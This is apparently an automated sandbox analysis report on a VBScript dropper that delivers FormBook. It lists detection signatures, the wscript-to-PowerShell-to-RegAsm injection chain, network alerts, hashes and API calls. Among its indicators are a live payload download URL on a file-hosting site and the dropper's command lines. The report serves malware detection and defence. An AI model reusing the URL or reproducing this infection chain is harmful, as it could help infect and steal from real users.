Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
z68scancopy.vbs

Overview

General Information

Sample name:z68scancopy.vbs
Analysis ID:1577448
MD5:f8d8d9515f5dea0a837e4ada0559cce9
SHA1:f6b49863b6aa0a17cb0da253d72b3126ca825ffc
SHA256:6c342244e4efc5514dcbb7fce2bd00ad28531afe1f400257abd4acb8ecfac2d4
Tags:vbsuser-Porcupine
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected VBS Downloader Generic
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Powershell drops PE file
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Script Initiated Connection
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7424 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\z68scancopy.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7660 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • x.exe (PID: 7844 cmdline: "C:\Users\user~1\AppData\Local\Temp\x.exe" MD5: 68FC317E2CC6A7B69F76B9D8DDEC0C79)
        • RegAsm.exe (PID: 7868 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
z68scancopy.vbsJoeSecurity_VBS_Downloader_GenericYara detected VBS Downloader GenericJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.1720694148.0000000000E50000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Process Memory Space: powershell.exe PID: 7660INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x272d9f:$b1: ::WriteAllBytes(
        • 0x272dbb:$b2: ::FromBase64String(
        • 0x124925:$s1: -join
        • 0x1299d6:$s1: -join
        • 0x21790a:$s1: -join
        • 0x224b8b:$s1: -join
        • 0x22804d:$s1: -join
        • 0x2286e7:$s1: -join
        • 0x22a1e3:$s1: -join
        • 0x22c437:$s1: -join
        • 0x22cc5e:$s1: -join
        • 0x22d4b9:$s1: -join
        • 0x22dbf4:$s1: -join
        • 0x22dc26:$s1: -join
        • 0x22dc6e:$s1: -join
        • 0x22dc8d:$s1: -join
        • 0x22e4de:$s1: -join
        • 0x22e65a:$s1: -join
        • 0x22e6d2:$s1: -join
        • 0x22e765:$s1: -join
        • 0x22e9cb:$s1: -join

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        7.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          7.2.RegAsm.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Script Initiated Connection to Non-Local Network
            Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 108.181.20.35, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7424, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49701
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\z68scancopy.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\z68scancopy.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\z68scancopy.vbs", ProcessId: 7424, ProcessName: wscript.exe
            Sigma detected: Script Initiated Connection
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 108.181.20.35, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7424, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49701
            Sigma detected: Use Short Name Path in Command Line
            Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\x.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\x.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\x.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\x.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\x.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7660, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\x.exe" , ProcessId: 7844, ProcessName: x.exe
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\z68scancopy.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\z68scancopy.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\z68scancopy.vbs", ProcessId: 7424, ProcessName: wscript.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\z68scancopy.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7424, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", ProcessId: 7660, ProcessName: powershell.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-18T13:37:43.056873+010020188561A Network Trojan was detected108.181.20.35443192.168.2.749701TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-18T13:37:42.820303+010028275781A Network Trojan was detected192.168.2.749701108.181.20.35443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\x.exeAvira: detection malicious, Label: TR/Dropper.Gen
            Multi AV Scanner detection for submitted file
            Source: z68scancopy.vbsReversingLabs: Detection: 21%
            Yara detected FormBook
            Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1720694148.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\x.exeJoe Sandbox ML: detected
            Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.7:49701 version: TLS 1.2
            Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp

            Spreading

            barindex
            Yara detected VBS Downloader Generic
            Source: Yara matchFile source: z68scancopy.vbs, type: SAMPLE

            Software Vulnerabilities

            barindex
            Suspicious execution chain found
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2827578 - Severity 1 - ETPRO MALWARE Likely Dropper Doc GET to .moe TLD : 192.168.2.7:49701 -> 108.181.20.35:443
            Source: Network trafficSuricata IDS: 2018856 - Severity 1 - ET MALWARE Windows executable base64 encoded : 108.181.20.35:443 -> 192.168.2.7:49701
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 108.181.20.35 443Jump to behavior
            Source: Joe Sandbox ViewIP Address: 108.181.20.35 108.181.20.35
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: GET /q8ynky.ps1 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: files.catbox.moeConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /q8ynky.ps1 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: files.catbox.moeConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: files.catbox.moe
            Source: powershell.exe, 00000004.00000002.1396144396.000001D881BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1423743791.000001D89007F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000004.00000002.1396144396.000001D881BA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000004.00000002.1396144396.000001D880001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000004.00000002.1396144396.000001D88183E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 00000004.00000002.1396144396.000001D881BA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000004.00000002.1396144396.000001D880001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000004.00000002.1423743791.000001D89007F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000004.00000002.1423743791.000001D89007F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000004.00000002.1423743791.000001D89007F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: wscript.exe, 00000000.00000003.1453026696.0000023359B15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe
            Source: wscript.exe, 00000000.00000003.1452350762.0000023357BD6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1453923296.0000023357BD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1452049395.0000023357BD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/
            Source: wscript.exe, 00000000.00000002.1454114233.00000233599A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1453923296.0000023357BD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1452049395.0000023357BD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1453704015.0000023357B17000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1453767715.0000023357B28000.00000004.00000020.00020000.00000000.sdmp, z68scancopy.vbsString found in binary or memory: https://files.catbox.moe/q8ynky.ps1
            Source: wscript.exe, 00000000.00000003.1452187676.0000023357B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1453799990.0000023357B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1452534194.0000023357B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1453187394.0000023357B77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/q8ynky.ps13
            Source: wscript.exe, 00000000.00000003.1452187676.0000023357B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1453799990.0000023357B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1452534194.0000023357B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1453187394.0000023357B77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/q8ynky.ps1=
            Source: wscript.exe, 00000000.00000003.1452801377.0000023357B27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1453767715.0000023357B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/q8ynky.ps1k
            Source: wscript.exe, 00000000.00000003.1452350762.0000023357BD6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1453923296.0000023357BD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1452049395.0000023357BD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/~
            Source: wscript.exe, 00000000.00000003.1453026696.0000023359B15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe;
            Source: powershell.exe, 00000004.00000002.1396144396.000001D881BA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: wscript.exe, 00000000.00000003.1452350762.0000023357BD6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1453923296.0000023357BD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1452049395.0000023357BD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comZZZZ
            Source: powershell.exe, 00000004.00000002.1396144396.000001D881BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1423743791.000001D89007F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000004.00000002.1396144396.000001D88183E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
            Source: powershell.exe, 00000004.00000002.1396144396.000001D88183E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
            Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.7:49701 version: TLS 1.2

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1720694148.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: Process Memory Space: powershell.exe PID: 7660, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            .NET source code contains very large strings
            Source: x.exe.4.dr, Program.csLong String: Length: 382988
            Source: 4.2.powershell.exe.1d89066c238.0.raw.unpack, Program.csLong String: Length: 382988
            Powershell drops PE file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
            Wscript starts Powershell (via cmd or directly)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042C5E3 NtClose,7_2_0042C5E3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E435C0 NtCreateMutant,LdrInitializeThunk,7_2_02E435C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_02E42C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_02E42DF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E44340 NtSetContextThread,7_2_02E44340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E43090 NtSetValueKey,7_2_02E43090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E43010 NtOpenDirectoryObject,7_2_02E43010
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E44650 NtSuspendThread,7_2_02E44650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42AF0 NtWriteFile,7_2_02E42AF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42AD0 NtReadFile,7_2_02E42AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42AB0 NtWaitForSingleObject,7_2_02E42AB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42BE0 NtQueryValueKey,7_2_02E42BE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42BF0 NtAllocateVirtualMemory,7_2_02E42BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42BA0 NtEnumerateValueKey,7_2_02E42BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42B80 NtQueryInformationFile,7_2_02E42B80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42B60 NtClose,7_2_02E42B60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E439B0 NtGetContextThread,7_2_02E439B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42EE0 NtQueueApcThread,7_2_02E42EE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42EA0 NtAdjustPrivilegesToken,7_2_02E42EA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42E80 NtReadVirtualMemory,7_2_02E42E80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42E30 NtWriteVirtualMemory,7_2_02E42E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42FE0 NtCreateFile,7_2_02E42FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42FA0 NtQuerySection,7_2_02E42FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42FB0 NtResumeThread,7_2_02E42FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42F90 NtProtectVirtualMemory,7_2_02E42F90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42F60 NtCreateProcessEx,7_2_02E42F60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42F30 NtCreateSection,7_2_02E42F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42CF0 NtOpenProcess,7_2_02E42CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42CC0 NtQueryVirtualMemory,7_2_02E42CC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42CA0 NtQueryInformationToken,7_2_02E42CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42C60 NtCreateKey,7_2_02E42C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42C00 NtQueryInformationProcess,7_2_02E42C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42DD0 NtDelayExecution,7_2_02E42DD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42DB0 NtEnumerateKey,7_2_02E42DB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E43D70 NtOpenThread,7_2_02E43D70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42D30 NtUnmapViewOfSection,7_2_02E42D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42D00 NtSetInformationFile,7_2_02E42D00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42D10 NtMapViewOfSection,7_2_02E42D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E43D10 NtOpenProcessToken,7_2_02E43D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004030507_2_00403050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004011607_2_00401160
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040E17C7_2_0040E17C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040E1307_2_0040E130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040E1337_2_0040E133
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00402BB07_2_00402BB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040246C7_2_0040246C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004024707_2_00402470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042EC037_2_0042EC03
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004044847_2_00404484
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040FDC37_2_0040FDC3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040274C7_2_0040274C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004027507_2_00402750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040DFE37_2_0040DFE3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040FFE37_2_0040FFE3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004167807_2_00416780
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004167837_2_00416783
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EB12ED7_2_02EB12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E2B2C07_2_02E2B2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E152A07_2_02E152A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EB02747_2_02EB0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ED03E67_2_02ED03E6
